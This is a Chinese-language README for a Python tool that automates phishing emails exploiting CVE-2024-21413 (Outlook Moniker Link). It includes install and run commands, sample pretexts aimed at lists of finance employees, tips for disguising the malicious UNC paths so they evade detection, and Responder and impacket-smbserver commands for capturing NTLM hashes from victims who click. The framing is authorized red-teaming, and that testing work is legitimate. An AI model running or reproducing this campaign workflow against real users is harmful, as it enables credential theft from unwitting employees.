一个用于模拟针对性钓鱼活动的安全研究工具,利用CVE-2024-21413 (Moniker Link)。
一个用于利用CVE-2024-21413 Moniker链接漏洞模拟定向钓鱼活动的安全研究工具。专为授权的红队行动、渗透测试和安全意识培训设计。
BLIND TRUST 是一个钓鱼活动框架,帮助安全团队了解和测试其对复杂电子邮件攻击的防御能力。它利用Moniker链接技术绕过Outlook的受保护视图,提供逼真的攻击模拟,组织可借此加强安全态势。
该工具自动完成端到端的活动工作流——从配置到电子邮件投递——同时通过可定制的UNC路径和灵活的话术选项维持操作安全性。
组织需要了解真实的攻击技术才能有效防御。TRUST 支持:
.txt文件加载目标# 克隆仓库
git clone https://github.com/h1ssbl1tz/Blind-Trust.git
cd TRUST
# 运行工具
python3 TRUST_v7.py
该工具仅使用Python标准库模块:
getpass - 安全密码输入
html - HTML转义
ipaddress - IP地址验证
logging - 结构化日志
os - 文件操作
re - 正则表达式
signal - 信号处理
smtplib - SMTP邮件协议
sys - 系统工具
time - 时间操作
dataclasses - 配置建模
email - MIME邮件构建
typing - 类型提示
无需外部包——可在任何Python 3.7+环境中运行。
python3 TRUST_v7.py
按照交互式向导完成5个步骤:
Load targets from [f]ile or [i]nput directly?: i
Target email address(es): [email protected], [email protected]
Email subject [Security Update Required]: Urgent: Password Expiration Notice
Display name (From field) [Microsoft Security Center]: IT Security Team
Email body text: Your password expires in 24 hours. Please update immediately.
UNC host (IP or domain) [192.168.1.100]: it-internal.company.com
UNC share name [updates]: patches
UNC exploit name [patch]: kb_security_2024
创建targets.txt:
# Finance Department
[email protected]
[email protected]
[email protected]
# Accounting
[email protected]
[email protected]
然后运行:
Load targets from [f]ile or [i]nput directly?: f
Path to targets file: targets.txt
[+] Loaded 5 target(s) from targets.txt
Email subject: Q3 Financial Review - Action Required
Display name: Finance Operations Team
Email body: Please review the attached Q3 financial statement and provide approval.
UNC host: finance-internal.company.com
UNC share: quarterly
UNC exploit: q3_financial_report
Generated UNC path: file://finance-internal.company.com/quarterly!q3_financial_report
两种选项:
.txt文件加载,每行一个邮箱,以#开头的注释行这是避免明显签名的关键:
finance-internal.company.com)而非仅IPquarterly、updates、documentsq3_report、security_patch、training_document结果:不再是明显的\\192.168.1.100\share!exploit,而是类似file://finance-internal.company.com/quarterly!q3_report。
Start
↓
[步骤1] 提示输入攻击者邮箱和SMTP密码
↓
[步骤2] 提示输入SMB监听器IP
↓
[步骤3] 加载目标邮箱(文件或输入)
↓
↓→ 对每个目标:
│ - 验证邮箱格式
│ - 检查重复
│
[步骤4] 提示输入邮件话术
│ - 主题、发件人名称、正文文本
│
[步骤5] 提示输入UNC路径自定义
│ - 主机、共享名、漏洞利用名
│
↓
[构建] 构造配置对象
↓
[验证] 检查所有字段是否完整有效
↓
[摘要] 显示发送前摘要以供审核
↓
[确认] 用户批准或取消
↓
[发送] 对每个目标:
│ - 构建带有自定义Moniker链接的MIME邮件
│ - 尝试SMTP投递,带重试逻辑
│ - 记录每个目标的成功/失败
│
↓
[报告] 显示活动结果(已投递 vs 失败)
↓
Exit
CVE-2024-21413(Moniker链接)是一个Outlook漏洞,允许嵌入包含!字符的file:// URL。当用户点击此类链接时,Outlook会尝试访问UNC路径,即使在受保护视图模式下也会触发NTLM认证尝试。
\\host\share!exploit!字符绕过受保护视图TRUST 自动化投递阶段:
解决方案:验证SMTP凭据。对于Gmail,使用应用专用密码。对于企业邮箱,联系您的SMTP管理员。
解决方案:某些SMTP服务器正常。连接将在无TLS加密的情况下进行。
解决方案:确保词表文件中的邮箱完整且格式有效([email protected])。
解决方案:目标服务器上不存在该邮箱地址,或服务器阻止从您账户的中继。
解决方案:验证文件路径正确且文件存在于当前目录。
问:使用此工具合法吗? 答:仅当您有被测试组织的明确书面授权时才合法。未经授权的钓鱼行为是违法的。始终持有书面的工作范围和交战规则。
问:能否绕过高级邮件过滤器? 答:这是一个逼真的模拟,但现代邮件安全仍可能识别。这正是关键——如果您组织的过滤器无法拦截此类攻击,则存在需要解决的问题。
问:为什么要自定义UNC路径?
答:原始的\\IP\share!exploit是明显的暴露标志。真正的攻击者使用逼真的路径。您的安全团队应能同时捕获明显和细微的指标。
问:能否用于培训员工? 答:可以。在授权测试后,可在安全意识培训中使用脱敏后的活动示例,向员工展示真实的攻击技术。
问:此工具会捕获凭据吗? 答:不会。TRUST仅负责投递邮件。您需要单独的SMB监听器(Responder、impacket-smbserver等)来在目标点击链接时捕获NTLM哈希。
问:如何设置SMB监听器? 答:在Linux上使用Responder或impacket-smbserver:
# Responder(捕获哈希)
sudo responder -i eth0 -v
# impacket-smbserver(文件服务器模拟)
impacket-smbserver Share /tmp -smb2support
此工具仅用于授权安全测试。
使用TRUST即表示您确认了解法律后果并已获得适当授权。
本项目采用MIT许可证发布,并附加使用限制。详见LICENSE。
本项目基于并受灵感来自于CMNatic (https://github.com/cmnatic) 的原始CVE-2024-21413研究和实现。
CMNatic应获得全部荣誉:
本仓库代表对该工作的修改和扩展版本,增强功能包括:
详见CREDITS.md。
H1SS - 为此版本进行扩展和维护,用于安全研究和授权测试。
欢迎贡献。请确保任何更改:
参见CONTRIBUTING.md。
如有问题、疑问或建议,请在GitHub上提交issue。
记住:此工具是一个研究项目。请负责任、合法、合乎道德地使用。